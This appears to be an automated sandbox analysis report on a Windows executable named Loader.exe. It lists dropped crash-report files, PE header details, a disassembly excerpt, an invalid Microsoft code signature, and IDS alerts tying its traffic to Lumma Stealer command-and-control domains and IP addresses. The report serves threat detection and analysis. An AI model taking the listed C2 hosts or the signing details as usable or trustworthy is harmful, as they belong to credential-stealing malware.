.r.=.2.0.2.4.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D9.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Oct 12 20:36:15 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	123820
Entropy (8bit):	1.9721705128887455
Encrypted:	false
SSDEEP:	384:L04TkSpfkBvek0yZr2A8zSfbrJGV+vmRs5hc2CKRf7A/C3WpcEZjF:o43pfkBGcwAIE/c+uRsTnfU/WgZ
MD5:	74B5A867C61D14539A8C9A23354AF0D9
SHA1:	B24820AFA77085F447ED8EDD1465D55CDA7FBFB1
SHA-256:	1B7F7E5989C07C480134ABE692EC206AA302CA97DFEDB8173D69D6CB572AAA40
SHA-512:	869024E692E7156E289B23CD2A8474C209E431DD293C4AD73F39BFBF9DD7181B3744A1B7DE44027A0872D6DD83C5F2E7242E7907C66B9038DF3B486431D5106E
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........g....................................l....!......T....K..........`.......8...........T............A.............L"..........8$..............................................................................eJ.......$......GenuineIntel............T.......P......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3AF.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6348
Entropy (8bit):	3.7031912502298407
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetb8m66kY/+JPf6SJ55aMQUM89bP3sfy1lm:R6l7wVeJP66kYmJPJpDM89bP3sfy1lm
MD5:	06CA2785F70E2D8DF872D5689242553A
SHA1:	04D0AD692F274DD57E3041066B5731603E74E6CF
SHA-256:	567D9B00070728E8084582BC6BE115D19ADE2071366D74CA80F32D73ABA8D30A
SHA-512:	7C9AC94D292395A7C7E35024AE785BFF7432D5EEC47A6CCA9BA78BF776FDEBFEDC712E4DADF458A9697C48D96A1F6D2C1FA173FA8E1123FA5A12CDE3151F5523
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.0.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3DF.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4670
Entropy (8bit):	4.425998542330923
Encrypted:	false
SSDEEP:	48:cvIwWl8zsQJg77aI9XEWpW8VYMYm8M4J9hFhD+q8v9CudQiwid:uIjfWI7hd7VcJDDKFdlwid
MD5:	82C8B6CB7283FA26B3B99B5F2985F0A1
SHA1:	04C7BAD5A94DA6B0D45C16CC6C875031649C07A3
SHA-256:	B7C26F625BB32191D1DF0EB5D64B6795FE9CB56190C978CB99B826E718E6F60C
SHA-512:	4503B092BAD166FA6FA1D85FE0BA0BD05DFD1000B9261EA4D73BB8412CF430052433AD1E37AAC03B833F82295BE79DAAFFEF779A023A0B910E9F5422A87B8A9D
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="540698" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD7B.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Oct 12 20:36:01 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	32954
Entropy (8bit):	1.7402327385029992
Encrypted:	false
SSDEEP:	192:PkYvZfmmyO0qEbOJXdkg6bguUGp65J9mWu:/Z90iJX0UGg5JM
MD5:	83BD6ED4195D03B6BC9147C1364EBAA1
SHA1:	F43CCD3CA2873EC22DFA35FBF3E5169463DAA3E2
SHA-256:	DD881A5E2088475923EFA26CF90F2E8F537656ACCC4CCB8393753C74EB961DCD
SHA-512:	22A598E113D99D4842BBFD2494AAE6F30F828ECE4343C1C501E54CBE52E4623FAF7A3B255BA737E7C9C125F94D31797E1856E28A1982B9D13DA3578577EE58BE
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........g........................d...........................T.......8...........T...........(....u......................................................................................................eJ..............GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCDE9.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8274
Entropy (8bit):	3.6871615268553817
Encrypted:	false
SSDEEP:	192:R6l7wVeJQc6vS6Y2DESUOgmfEbpr089bKHsfKOm:R6lXJL666YJSUOgmfEHKMfa
MD5:	4CC77A9E044CD62E31B3090822FBCDB7
SHA1:	4DBEB2248B7BC5F42DB92D4673BEDEF11849EA02
SHA-256:	DA0A1359C23A22CC0DE8AFCCD7853F1BB68D122C95C2CD0060F2AD76336B3693
SHA-512:	9DCB8F046D9BC6F2C6845E044177A24CA1FFC70DC3C65D4D640860893186F38A913E8B9C60521962C9B2E6FAAE01605CE385DEA44E54E180330D0C82247D7470
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.9.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE19.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4555
Entropy (8bit):	4.436426714247443
Encrypted:	false
SSDEEP:	48:cvIwWl8zsQJg77aI9XEWpW8VY0Ym8M4JKmF/+q8e2odQiw5d:uIjfWI7hd7V8JTGodlw5d
MD5:	5D230DAE5C797B4A21786476519B1D7E
SHA1:	87FAEC83D0D0BC487DAA6DD6D842D2A60F12DDE9
SHA-256:	C6B2C77D7E7B7DB269F7AFA637DE7E28125B03B0D80455A426F5AE7BF8414B01
SHA-512:	10275D990EF998BB5D272AF5608D463A00555ABBA90F3EFC74DC5FB3A3F4390CA1683CBACEABBD49D4A29E96121413537B771A09B66CE566A4C58A0C64320AB2
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="540698" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF8FF.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Oct 12 20:36:12 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	123330
Entropy (8bit):	1.9647775998473684
Encrypted:	false
SSDEEP:	384:/kSKFkBve8U0yZr2AkGSfbrJGVXQRP5hImv4/LomMw9E5:/3MkBG8swABE/cXQRPTt40mV9
MD5:	A648B2726C41C5E73C1CFF9143417346
SHA1:	26260C46CB206BEAF5E3FBAD74354AD133ADB402
SHA-256:	A74FBD6C0B8222FE984A954968911D618C3C6AFF2ED08B2F5A77795F9C874955
SHA-512:	D990A6B98B5634F7C182D2E87FA09D0D6AB8815E349107E26D47BD06D0254A927ED0E735E977F603301C5FCB5D51CC99779BABD34819B2D3FBD16E757A11071A
Malicious:	false
Preview:	MDMP..a..... ..........g....................................l....!......D....K..........`.......8...........T...........8A..............L"..........8$..............................................................................eJ.......$......GenuineIntel............T.......P......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFA48.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6298
Entropy (8bit):	3.712449321588773
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetb8m36qHYY+JzQZJ55aM4U289b53sf7zm:R6l7wVeJP36SYtJzQ3pr289b53sf7zm
MD5:	DA786E75231CFCD598ABD14B1335FF58
SHA1:	2020EFC98C35FBDE46B2D0A2576EC590999CF2B8
SHA-256:	5FCAB27A650C33BD3C44DCA5C9BDA7AE569D78B99E06DB584C81583B67911941
SHA-512:	B7FE4473AB1E805DF07C5103DEFAA48F5C443AC5A04675AA821C9A156F36C22894719E34C56FE0DD8DA2C79F9267D7FC8CED7377C3F2AF26A7FFA1AFB89CBE1A
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.0.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFA78.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4569
Entropy (8bit):	4.438477875068169
Encrypted:	false
SSDEEP:	48:cvIwWl8zsQJg77aI9XEWpW8VYFYm8M4J9kFkj+q8cyudQiwid:uIjfWI7hd7VZJFLdlwid
MD5:	1F60B5DC383C4234F4D611F75C028A71
SHA1:	EC73AEA41CA55B8849005EE55063ABB3C0DE0E1C
SHA-256:	8FDB10F2CB1A6DD2F27FE1104D3CCCA5806766F34345E7D2BDA1B420E7EB5DCB
SHA-512:	C46911928608D3D721D3AEFD28DBC63B78755A4EC6F90EEEA141894476D19311DE0936E6359CC2920D68122181021FA0067560DF94E954CF2EF3898B73833285
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="540698" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.468552463259391
Encrypted:	false
SSDEEP:	6144:yzZfpi6ceLPx9skLmb0frZWSP3aJG8nAgeiJRMMhA2zX4WABluuNijDH5S:UZHtrZWOKnMM6bFpcj4
MD5:	0FDB2EEED0DB4B8AE4244BF5F02A38B3
SHA1:	3099CED2713D09F745479570F717836124AC9EAF
SHA-256:	4908B6BC4A7FEE1D75EEBDDBC9526996D425A65F2E1A0813D3A56604135E963A
SHA-512:	57A3927A2EE7366BF949388FB9DFB004E443FD1EBBD48D39EACE261BE51817EE07FC41D0ABCD8C5A3B262775BA454AF2C788B89B6C4DB178766272438D436F06
Malicious:	false
Preview:	regfJ...J....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...Y...................................................................................................................................................................................................................................................................................................................................................m........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.7256152523901545
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Loader.exe
File size:	581'008 bytes
MD5:	cb50acc9b951b52306b95eaf8d4e2048
SHA1:	fd087d7b18d9dd37cb68f811f72de6c0dbbbfd31
SHA256:	16fd5c981d6da5cbd47293b35b0dd26c756493fe3f88d5613810a2f9b5159b39
SHA512:	a5c7fe0ddf98a79da2f369c0c104941c1ca626b7a61d0dbdc82853053240a941c4886add3788fed3c6c5fca89ea02ba2e933c5fca6cf44d52dd9eafd02d5af5c
SSDEEP:	12288:9nd8lywbKG/kz3lLEIfUN0YtUqifN0mCb0LwoMZJRv9qB+9lec8OGY5BA:99wW53lYIfM0fOzoLwoMZJR2+ve717
TLSH:	C9C4F15275C08073EAB7153102E4DA726E7DB6E10E5069DF63D59FBE0F613C0EA20A6B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a.............U.......U...,...U.......U.......................................................Rich...........................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x406b1a
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6709465D [Fri Oct 11 15:38:05 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2bf5d9e2e4bbff197e62f5db8f2f3336

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	19/10/2023 21:51:12 16/10/2024 21:51:12
Subject Chain	CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:	3
Thumbprint MD5:	2169E18183DAF704160A117E905BFDA4
Thumbprint SHA-1:	CB9C4FBEA1D87D2D468AC5A9CAAB0163F6AD8401
Thumbprint SHA-256:	C4405F06DFB035F3AD360D29D27D434E004E054B6FB18FA3A5566A9F9AFA8296
Serial:	3300000557CF90DDC7D1C0888C000000000557

Entrypoint Preview

Instruction
call 00007F41C1A94FC5h
jmp 00007F41C1A9450Fh
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007F41C1A946ABh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007F41C1A9469Ch
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007F41C1A9469Eh
add edx, 28h
cmp edx, esi
jne 00007F41C1A9467Ch
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007F41C1A9468Bh
push esi
call 00007F41C1A952CCh
test eax, eax
je 00007F41C1A946B2h
mov eax, dword ptr fs:[00000018h]
mov esi, 00484D48h
mov edx, dword ptr [eax+04h]
jmp 00007F41C1A94696h
cmp edx, eax
je 00007F41C1A946A2h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007F41C1A94682h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
jne 00007F41C1A94699h
mov byte ptr [00484D4Ch], 00000001h
call 00007F41C1A94955h
call 00007F41C1A9787Fh
test al, al
jne 00007F41C1A94696h
xor al, al
pop ebp
ret
call 00007F41C1AA055Ch
test al, al
jne 00007F41C1A9469Ch
push 00000000h
call 00007F41C1A97886h
pop ecx
jmp 00007F41C1A9467Bh
mov al, 01h
pop ebp
ret
push ebp
mov ebp, esp
cmp byte ptr [00484D4Dh], 00000000h
je 00007F41C1A94696h
mov al, 01h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2c960	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x88000	0x128	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x88ec8	0x4ec8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x86000	0x1bf0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2ac48	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2ab88	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x23000	0x128	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2109b	0x21200	fc39cf76189ab7c227ec12f73e6a3932	False	0.5790683962264151	data	6.629638369205259	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x23000	0xa004	0xa200	7ae763a2ed0268467b431e4f40185ebf	False	0.42879533179012347	data	4.914287343080596	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2e000	0x5796c	0x56a00	dabe9cdbf081fb2f304d89bb59671932	False	0.9913109893578643	DOS executable (block device driver \377\377\377\377)	7.992943735511485	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x86000	0x1bf0	0x1c00	0190908279e9d6b3b648ee70a4a85ce4	False	0.7565569196428571	data	6.538484011809682	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x88000	0x128	0x200	239a18c31ff02bce8aaacba8dc7cd677	False	0.291015625	data	1.5878130901584442	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
MUI	0x88060	0xc8	data	English	United States	0.535

Imports

DLL

Import

KERNEL32.dll

TlsFree, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, CreateFileW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetProcessHeap, HeapSize, WriteConsoleW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-12T22:36:02.740997+0200	2056572	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (widdensmoywi .sbs)	1	192.168.2.6	55988	1.1.1.1	53	UDP
2024-10-12T22:36:03.254074+0200	2056573	ET MALWARE Observed Win32/Lumma Stealer Related Domain (widdensmoywi .sbs in TLS SNI)	1	192.168.2.6	49710	104.21.8.37	443	TCP
2024-10-12T22:36:03.754512+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49710	104.21.8.37	443	TCP
2024-10-12T22:36:03.754512+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49710	104.21.8.37	443	TCP
2024-10-12T22:36:03.762048+0200	2056570	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs)	1	192.168.2.6	64493	1.1.1.1	53	UDP
2024-10-12T22:36:04.269367+0200	2056571	ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI)	1	192.168.2.6	49713	188.114.96.3	443	TCP
2024-10-12T22:36:04.696511+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49713	188.114.96.3	443	TCP
2024-10-12T22:36:04.696511+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49713	188.114.96.3	443	TCP
2024-10-12T22:36:04.698408+0200	2056568	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs)	1	192.168.2.6	53786	1.1.1.1	53	UDP
2024-10-12T22:36:04.758725+0200	2056566	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs)	1	192.168.2.6	50381	1.1.1.1	53	UDP
2024-10-12T22:36:05.271502+0200	2056567	ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI)	1	192.168.2.6	49715	104.21.33.249	443	TCP
2024-10-12T22:36:05.691027+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49715	104.21.33.249	443	TCP
